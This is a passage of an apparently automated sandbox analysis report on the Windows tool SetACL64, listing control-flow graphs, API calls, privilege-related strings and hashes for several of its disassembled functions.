7ff7c17242a0-7ff7c17242b4 2904->2912 2907->2891 2907->2901 2908->2907 2934 7ff7c1724356-7ff7c172435b 2908->2934 2925 7ff7c1724331-7ff7c1724333 2909->2925 2917 7ff7c172435d-7ff7c1724367 call 7ff7c1724810 2910->2917 2918 7ff7c1724343-7ff7c1724354 call 7ff7c173e4b0 2910->2918 2920 7ff7c17242cd-7ff7c17242d2 2912->2920 2921 7ff7c17242b6-7ff7c17242c7 call 7ff7c173e4b0 2912->2921 2942 7ff7c17243b1-7ff7c17243dc call 7ff7c1742180 2917->2942 2944 7ff7c1724369-7ff7c1724372 2917->2944 2918->2917 2918->2934 2930 7ff7c17242ea-7ff7c1724312 2920->2930 2931 7ff7c17242d4-7ff7c17242e8 call 7ff7c173e4b0 2920->2931 2921->2920 2921->2934 2925->2910 2925->2934 2930->2903 2930->2912 2931->2930 2931->2934 2934->2942 2947 7ff7c1724177-7ff7c172418a 2940->2947 2948 7ff7c1724190-7ff7c1724195 call 7ff7c17421a0 2940->2948 2941->2888 2949 7ff7c17241a1-7ff7c17241b8 2941->2949 2950 7ff7c172439e-7ff7c17243a1 2944->2950 2951 7ff7c1724374-7ff7c1724396 call 7ff7c172a350 2944->2951 2947->2913 2947->2948 2948->2941 2958 7ff7c17241ba-7ff7c17241cd 2949->2958 2959 7ff7c17241d3 call 7ff7c17421a0 2949->2959 2955 7ff7c17243af 2950->2955 2956 7ff7c17243a3-7ff7c17243aa call 7ff7c173b2b0 2950->2956 2951->2942 2966 7ff7c1724398 2951->2966 2955->2942 2956->2955 2958->2894 2958->2959 2959->2888 2966->2950
                                                  APIs
                                                  Strings
                                                  • SeTakeOwnershipPrivilege, xrefs: 00007FF7C1723F39
                                                  • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF7C1723E37
                                                  • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF7C17240F4
                                                  • Prepare, xrefs: 00007FF7C1723E67, 00007FF7C1724124
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                  • String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
                                                  • API String ID: 637398405-1701055250
                                                  • Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                                  • Instruction ID: c77cc8134237ee559abf351430eb185c8b09e6fc28fb277a0563e36015b18200
                                                  • Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                                  • Instruction Fuzzy Hash: 30E1A5B2B1874281EB04DF56E044369A361FB897F4F905135EA9E43AEADFBCE095C710
                                                  Function 00007FF7C171D304 Relevance: 16.8, APIs: 11, Instructions: 288timethreadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3047 7ff7c171d304-7ff7c171d30a 3048 7ff7c171d310-7ff7c171d318 3047->3048 3049 7ff7c171d65f-7ff7c171d668 LeaveCriticalSection 3047->3049 3050 7ff7c171d31a-7ff7c171d320 3048->3050 3051 7ff7c171d326-7ff7c171d32e 3048->3051 3052 7ff7c171d669-7ff7c171d66d 3049->3052 3050->3049 3050->3051 3053 7ff7c171d35b-7ff7c171d35d 3051->3053 3054 7ff7c171d330-7ff7c171d355 GetSystemTimeAsFileTime 3051->3054 3055 7ff7c171d66f-7ff7c171d685 3052->3055 3056 7ff7c171d6a6-7ff7c171d6aa 3052->3056 3059 7ff7c171d36f-7ff7c171d371 3053->3059 3060 7ff7c171d35f-7ff7c171d369 GetCurrentThreadId 3053->3060 3054->3053 3061 7ff7c171d687-7ff7c171d69a 3055->3061 3062 7ff7c171d6a0-7ff7c171d6a5 call 7ff7c17421a0 3055->3062 3057 7ff7c171d6ac-7ff7c171d6c2 3056->3057 3058 7ff7c171d6df-7ff7c171d6e7 3056->3058 3063 7ff7c171d6d9-7ff7c171d6de call 7ff7c17421a0 3057->3063 3064 7ff7c171d6c4-7ff7c171d6d7 3057->3064 3065 7ff7c171d6e9-7ff7c171d6ff 3058->3065 3066 7ff7c171d71b-7ff7c171d741 call 7ff7c1742180 3058->3066 3067 7ff7c171d527-7ff7c171d5b0 LeaveCriticalSection call 7ff7c17421d4 3059->3067 3068 7ff7c171d377-7ff7c171d3a4 GetUserNameExW 3059->3068 3060->3059 3061->3062 3069 7ff7c171d74e-7ff7c171d753 call 7ff7c17488fc 3061->3069 3062->3056 3063->3058 3064->3063 3072 7ff7c171d754-7ff7c171d759 call 7ff7c17488fc 3064->3072 3075 7ff7c171d701-7ff7c171d714 3065->3075 3076 7ff7c171d716 call 7ff7c17421a0 3065->3076 3090 7ff7c171d5cc-7ff7c171d5e9 3067->3090 3091 7ff7c171d5b2-7ff7c171d5bb 3067->3091 3078 7ff7c171d3b9-7ff7c171d3e4 call 7ff7c1715790 GetUserNameExW 3068->3078 3079 7ff7c171d3a6-7ff7c171d3b3 GetLastError 3068->3079 3069->3072 3075->3076 3076->3066 3094 7ff7c171d3f0-7ff7c171d3f7 3078->3094 3095 7ff7c171d3e6-7ff7c171d3ee GetLastError 3078->3095 3079->3078 3087 7ff7c171d45a-7ff7c171d45c 3079->3087 3087->3067 3093 7ff7c171d462-7ff7c171d4c9 call 7ff7c1710520 call 7ff7c170a740 3087->3093 3098 7ff7c171d5eb-7ff7c171d600 call 7ff7c1713f80 3090->3098 3099 7ff7c171d605-7ff7c171d60c 3090->3099 3096 7ff7c171d5bd 3091->3096 3097 7ff7c171d5c1-7ff7c171d5c7 call 7ff7c1713f80 3091->3097 3122 7ff7c171d51c-7ff7c171d526 call 7ff7c1709720 3093->3122 3123 7ff7c171d4cb-7ff7c171d4d2 3093->3123 3102 7ff7c171d400-7ff7c171d409 3094->3102 3101 7ff7c171d41a-7ff7c171d41d 3095->3101 3096->3097 3097->3090 3098->3099 3105 7ff7c171d62b-7ff7c171d62e 3099->3105 3106 7ff7c171d60e-7ff7c171d627 call 7ff7c1713f80 3099->3106 3101->3087 3112 7ff7c171d41f-7ff7c171d437 3101->3112 3102->3102 3111 7ff7c171d40b-7ff7c171d417 call 7ff7c1713f80 3102->3111 3108 7ff7c171d64a-7ff7c171d65d call 7ff7c171ea60 3105->3108 3109 7ff7c171d630-7ff7c171d639 3105->3109 3106->3105 3108->3052 3114 7ff7c171d63b 3109->3114 3115 7ff7c171d63e-7ff7c171d649 call 7ff7c1713f80 3109->3115 3111->3101 3119 7ff7c171d439-7ff7c171d44c 3112->3119 3120 7ff7c171d452-7ff7c171d455 call 7ff7c17421a0 3112->3120 3114->3115 3115->3108 3119->3120 3127 7ff7c171d748-7ff7c171d74d call 7ff7c17488fc 3119->3127 3120->3087 3122->3067 3129 7ff7c171d4f7-7ff7c171d502 3123->3129 3130 7ff7c171d4d4-7ff7c171d4dd 3123->3130 3127->3069 3129->3122 3137 7ff7c171d504-7ff7c171d50d 3129->3137 3135 7ff7c171d4df 3130->3135 3136 7ff7c171d4e2-7ff7c171d4f2 call 7ff7c1713f80 3130->3136 3135->3136 3136->3129 3140 7ff7c171d50f 3137->3140 3141 7ff7c171d512-7ff7c171d51b call 7ff7c1713f80 3137->3141 3140->3141 3141->3122
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
                                                  • String ID:
                                                  • API String ID: 3424761043-0
                                                  • Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                                  • Instruction ID: f33a3d762309f7401753515b5881d6949de4979e9e9b18c20200d0c3aa29824e
                                                  • Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                                  • Instruction Fuzzy Hash: 4CC1B032B14A4286EB00EF66D4482ACB371FB497A8FA14631DE5C5779ADFBCE444C760
                                                  Function 00007FF7C1723FD8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 226COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3213 7ff7c1723fd8-7ff7c1724008 AdjustTokenPrivileges 3214 7ff7c172400a-7ff7c1724012 GetLastError 3213->3214 3215 7ff7c1724023-7ff7c1724036 GetLastError CloseHandle 3213->3215 3214->3215 3216 7ff7c1724014-7ff7c1724021 CloseHandle 3214->3216 3217 7ff7c1724037-7ff7c1724040 3215->3217 3216->3217 3218 7ff7c1724079-7ff7c1724095 3217->3218 3219 7ff7c1724042-7ff7c1724059 3217->3219 3222 7ff7c1724097-7ff7c17240ae 3218->3222 3223 7ff7c17240ce-7ff7c17240d0 3218->3223 3220 7ff7c172405b-7ff7c172406e 3219->3220 3221 7ff7c1724074 call 7ff7c17421a0 3219->3221 3220->3221 3224 7ff7c172441f-7ff7c1724424 call 7ff7c17488fc 3220->3224 3221->3218 3226 7ff7c17240c9 call 7ff7c17421a0 3222->3226 3227 7ff7c17240b0-7ff7c17240c3 3222->3227 3228 7ff7c17241d8-7ff7c1724209 3223->3228 3229 7ff7c17240d6-7ff7c172415c call 7ff7c1713f80 * 2 call 7ff7c171d260 3223->3229 3232 7ff7c1724425-7ff7c172442a call 7ff7c17488fc 3224->3232 3226->3223 3227->3226 3227->3232 3230 7ff7c1724268-7ff7c1724294 3228->3230 3231 7ff7c172420b-7ff7c172420e 3228->3231 3273 7ff7c172415e-7ff7c1724175 3229->3273 3274 7ff7c1724196-7ff7c172419f 3229->3274 3239 7ff7c1724314-7ff7c1724320 3230->3239 3240 7ff7c1724296-7ff7c1724299 3230->3240 3238 7ff7c1724210-7ff7c1724220 3231->3238 3249 7ff7c172442b-7ff7c1724430 call 7ff7c17488fc 3232->3249 3244 7ff7c1724239-7ff7c1724266 3238->3244 3245 7ff7c1724222-7ff7c1724233 call 7ff7c173e4b0 3238->3245 3246 7ff7c1724322-7ff7c172432c call 7ff7c173e4b0 3239->3246 3247 7ff7c1724335-7ff7c1724341 3239->3247 3248 7ff7c17242a0-7ff7c17242b4 3240->3248 3244->3230 3244->3238 3245->3244 3268 7ff7c1724356-7ff7c172435b 3245->3268 3260 7ff7c1724331-7ff7c1724333 3246->3260 3253 7ff7c172435d-7ff7c1724367 call 7ff7c1724810 3247->3253 3254 7ff7c1724343-7ff7c1724354 call 7ff7c173e4b0 3247->3254 3255 7ff7c17242cd-7ff7c17242d2 3248->3255 3256 7ff7c17242b6-7ff7c17242c7 call 7ff7c173e4b0 3248->3256 3275 7ff7c17243b1-7ff7c17243dc call 7ff7c1742180 3253->3275 3276 7ff7c1724369-7ff7c1724372 3253->3276 3254->3253 3254->3268 3264 7ff7c17242ea-7ff7c1724312 3255->3264 3265 7ff7c17242d4-7ff7c17242e8 call 7ff7c173e4b0 3255->3265 3256->3255 3256->3268 3260->3247 3260->3268 3264->3239 3264->3248 3265->3264 3265->3268 3268->3275 3278 7ff7c1724177-7ff7c172418a 3273->3278 3279 7ff7c1724190-7ff7c1724195 call 7ff7c17421a0 3273->3279 3274->3228 3280 7ff7c17241a1-7ff7c17241b8 3274->3280 3281 7ff7c172439e-7ff7c17243a1 3276->3281 3282 7ff7c1724374-7ff7c1724396 call 7ff7c172a350 3276->3282 3278->3249 3278->3279 3279->3274 3288 7ff7c17241ba-7ff7c17241cd 3280->3288 3289 7ff7c17241d3 call 7ff7c17421a0 3280->3289 3285 7ff7c17243af 3281->3285 3286 7ff7c17243a3-7ff7c17243aa call 7ff7c173b2b0 3281->3286 3282->3275 3296 7ff7c1724398 3282->3296 3285->3275 3286->3285 3288->3289 3294 7ff7c17243dd-7ff7c172441e call 7ff7c17488fc * 11 3288->3294 3289->3228 3294->3224 3296->3281
                                                  APIs
                                                  Strings
                                                  • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF7C17240F4
                                                  • Prepare, xrefs: 00007FF7C1724124
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast$AdjustPrivilegesToken
                                                  • String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
                                                  • API String ID: 1992325626-2245062721
                                                  • Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                                  • Instruction ID: e34f28846aa2088b9c98576b79db7238deead4a202d10370752c75767d7b71f6
                                                  • Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                                  • Instruction Fuzzy Hash: 1AA1B2B2B1864282EF14DF56E0443A9A361FB89BF4F805135EA5E476D6DFBCE091C710
                                                  Function 00007FF7C1756C40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3407 7ff7c1756c40-7ff7c1756c9c call 7ff7c1753e64 3410 7ff7c1756c9e-7ff7c1756cb2 call 7ff7c1756ba4 3407->3410 3411 7ff7c1756cb5-7ff7c1756cbc 3407->3411 3410->3411 3413 7ff7c1756d0b call 7ff7c175648c 3411->3413 3414 7ff7c1756cbe-7ff7c1756cc5 3411->3414 3420 7ff7c1756d10-7ff7c1756d14 3413->3420 3416 7ff7c1756cce call 7ff7c1756604 3414->3416 3417 7ff7c1756cc7-7ff7c1756ccc call 7ff7c1756534 3414->3417 3425 7ff7c1756cd3-7ff7c1756cd7 3416->3425 3417->3425 3423 7ff7c1756e6d 3420->3423 3424 7ff7c1756d1a-7ff7c1756d25 3420->3424 3426 7ff7c1756e6f-7ff7c1756e8d 3423->3426 3427 7ff7c1756d27-7ff7c1756d2b 3424->3427 3428 7ff7c1756d35-7ff7c1756d38 call 7ff7c1756a74 3424->3428 3425->3424 3429 7ff7c1756cd9-7ff7c1756cef call 7ff7c1756ba4 3425->3429 3427->3428 3430 7ff7c1756d2d-7ff7c1756d33 GetACP 3427->3430 3433 7ff7c1756d3d-7ff7c1756d41 3428->3433 3429->3420 3436 7ff7c1756cf1-7ff7c1756cfb 3429->3436 3430->3433 3433->3423 3435 7ff7c1756d47-7ff7c1756d4c 3433->3435 3435->3423 3437 7ff7c1756d52-7ff7c1756d5d IsValidCodePage 3435->3437 3438 7ff7c1756cfd-7ff7c1756d02 call 7ff7c1756534 3436->3438 3439 7ff7c1756d04-7ff7c1756d09 call 7ff7c1756604 3436->3439 3437->3423 3440 7ff7c1756d63-7ff7c1756d66 3437->3440 3438->3420 3439->3420 3443 7ff7c1756d6b-7ff7c1756d6e 3440->3443 3444 7ff7c1756d68 3440->3444 3447 7ff7c1756d74-7ff7c1756d7f 3443->3447 3448 7ff7c1756e66-7ff7c1756e6b 3443->3448 3444->3443 3449 7ff7c1756d83-7ff7c1756d8b 3447->3449 3448->3426 3449->3449 3450 7ff7c1756d8d-7ff7c1756da2 call 7ff7c17552dc 3449->3450 3453 7ff7c1756e8e-7ff7c1756f1b call 7ff7c174892c call 7ff7c1753e64 * 2 call 7ff7c1757448 GetLocaleInfoW 3450->3453 3454 7ff7c1756da8-7ff7c1756dbe call 7ff7c1757eb0 3450->3454 3473 7ff7c1756f1d-7ff7c1756f22 3453->3473 3474 7ff7c1756f24-7ff7c1756f37 call 7ff7c175c558 3453->3474 3454->3423 3460 7ff7c1756dc4-7ff7c1756de3 call 7ff7c1757eb0 3454->3460 3460->3423 3466 7ff7c1756de9-7ff7c1756df9 call 7ff7c17631a0 3460->3466 3471 7ff7c1756e0b-7ff7c1756e22 call 7ff7c1757eb0 3466->3471 3472 7ff7c1756dfb-7ff7c1756e09 call 7ff7c17631a0 3466->3472 3471->3423 3483 7ff7c1756e24-7ff7c1756e31 3471->3483 3472->3471 3472->3483 3477 7ff7c1756f63-7ff7c1756f8b call 7ff7c1742180 3473->3477 3485 7ff7c1756f59-7ff7c1756f60 3474->3485 3486 7ff7c1756f39 3474->3486 3487 7ff7c1756e33-7ff7c1756e4e call 7ff7c17552dc 3483->3487 3488 7ff7c1756e52-7ff7c1756e61 call 7ff7c175da08 3483->3488 3485->3477 3489 7ff7c1756f40-7ff7c1756f43 3486->3489 3487->3453 3495 7ff7c1756e50 3487->3495 3488->3448 3489->3485 3490 7ff7c1756f45-7ff7c1756f4e 3489->3490 3490->3489 3493 7ff7c1756f50-7ff7c1756f56 3490->3493 3493->3485 3495->3448
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastNameTranslate$CodePageValid
                                                  • String ID: utf8
                                                  • API String ID: 2136749100-905460609
                                                  • Opcode ID: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                                  • Instruction ID: c03797136905016451a3b6d16ef0eeb9f7aabe5708e430a1565069f1577d95ca
                                                  • Opcode Fuzzy Hash: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                                  • Instruction Fuzzy Hash: 5A917631A09B8285EB24BF22D4202B9A355FB4CBA0FD44531EA4D47697DFBCE552C760
                                                  Function 00007FF7C17013F0 Relevance: 4.5, APIs: 3, Instructions: 31synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Create$Event$Mutex
                                                  • String ID:
                                                  • API String ID: 646228171-0
                                                  • Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                                  • Instruction ID: d077b1f059a800f278c57c93bcb1e23eb1d14d1b685fca0b9b5a26e9cf1b7f7c
                                                  • Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                                  • Instruction Fuzzy Hash: DF016171E18B5282F314EF3BAC46725B291BF5E330F904635D44919D62DFFD20844720
                                                  Function 00007FF7C17494BC Relevance: .3, Instructions: 307COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3827717455-0
                                                  • Opcode ID: cd5847d95c1ec1ea5f6fa8942c7cd11692604adcea6c09be9589e5be80c42005
                                                  • Instruction ID: 8d9ff90edd2942f029254b67a56d3c5474e1654188ce974758c3abdfac0f02b9
                                                  • Opcode Fuzzy Hash: cd5847d95c1ec1ea5f6fa8942c7cd11692604adcea6c09be9589e5be80c42005
                                                  • Instruction Fuzzy Hash: A5C1E726A0868285FB60EF6394107FAA7A4FB8C7A8FD04035DE4D87686DFBCD505CB14
                                                  Function 00007FF7C174C28F Relevance: .2, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f9f6a45bebd045a65918cd93e0d102e00439adfc5451531a9305081acf388ad
                                                  • Instruction ID: f99fac776142e25a4dde6464d0f10b56f0a3f354fd14f93dec3a74fad563b947
                                                  • Opcode Fuzzy Hash: 5f9f6a45bebd045a65918cd93e0d102e00439adfc5451531a9305081acf388ad
                                                  • Instruction Fuzzy Hash: 1651F717A1820282EB68BE2B81006BDA790EF4C764FC45136DD4D4728BCFADE905CF71
                                                  Function 00007FF7C1753410 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 485612231-0
                                                  • Opcode ID: 8d8ad80b19cf41d7d45d56f594be254ad60926e3090e2f9cb78a876611dcab70
                                                  • Instruction ID: 2066d8977589be2f1bef1f2cc833cca2a80a87616278723302bb71f8bbb6634e
                                                  • Opcode Fuzzy Hash: 8d8ad80b19cf41d7d45d56f594be254ad60926e3090e2f9cb78a876611dcab70
                                                  • Instruction Fuzzy Hash: 5641D322714A5882EF44DF6BD9241A9A391BB4CFE4B99A432DE4D97B59DF7CD0428300
                                                  Function 00007FF7C1723A20 Relevance: 47.8, APIs: 21, Strings: 6, Instructions: 509COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1530 7ff7c1723a20-7ff7c1723ac6 GetLastError 1532 7ff7c1723ac8-7ff7c1723adf 1530->1532 1533 7ff7c1723aff-7ff7c1723b1b 1530->1533 1534 7ff7c1723afa call 7ff7c17421a0 1532->1534 1535 7ff7c1723ae1-7ff7c1723af4 1532->1535 1536 7ff7c1723b1d-7ff7c1723b34 1533->1536 1537 7ff7c1723b54-7ff7c1723b56 1533->1537 1534->1533 1535->1534 1538 7ff7c17243fb-7ff7c1724400 call 7ff7c17488fc 1535->1538 1540 7ff7c1723b4f call 7ff7c17421a0 1536->1540 1541 7ff7c1723b36-7ff7c1723b49 1536->1541 1542 7ff7c1723b5c-7ff7c1723be2 call 7ff7c1713f80 * 2 call 7ff7c171d260 1537->1542 1543 7ff7c1723c5e-7ff7c1723d83 call 7ff7c1713f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1537->1543 1544 7ff7c1724401-7ff7c1724406 call 7ff7c17488fc 1538->1544 1540->1537 1541->1540 1541->1544 1565 7ff7c1723c1c-7ff7c1723c25 1542->1565 1566 7ff7c1723be4-7ff7c1723bfb 1542->1566 1567 7ff7c1723dbc-7ff7c1723dd8 1543->1567 1568 7ff7c1723d85-7ff7c1723d9c 1543->1568 1556 7ff7c1724407-7ff7c172440c call 7ff7c17488fc 1544->1556 1569 7ff7c172440d-7ff7c1724412 call 7ff7c17488fc 1556->1569 1565->1543 1575 7ff7c1723c27-7ff7c1723c3e 1565->1575 1570 7ff7c1723bfd-7ff7c1723c10 1566->1570 1571 7ff7c1723c16-7ff7c1723c1b call 7ff7c17421a0 1566->1571 1576 7ff7c1723dda-7ff7c1723df1 1567->1576 1577 7ff7c1723e11-7ff7c1723e13 1567->1577 1572 7ff7c1723db7 call 7ff7c17421a0 1568->1572 1573 7ff7c1723d9e-7ff7c1723db1 1568->1573 1588 7ff7c1724413-7ff7c1724418 call 7ff7c17488fc 1569->1588 1570->1556 1570->1571 1571->1565 1572->1567 1573->1569 1573->1572 1581 7ff7c1723c59 call 7ff7c17421a0 1575->1581 1582 7ff7c1723c40-7ff7c1723c53 1575->1582 1583 7ff7c1723e0c call 7ff7c17421a0 1576->1583 1584 7ff7c1723df3-7ff7c1723e06 1576->1584 1585 7ff7c1723e19-7ff7c1723e9f call 7ff7c1713f80 * 2 call 7ff7c171d260 1577->1585 1586 7ff7c1723f1b-7ff7c1724040 call 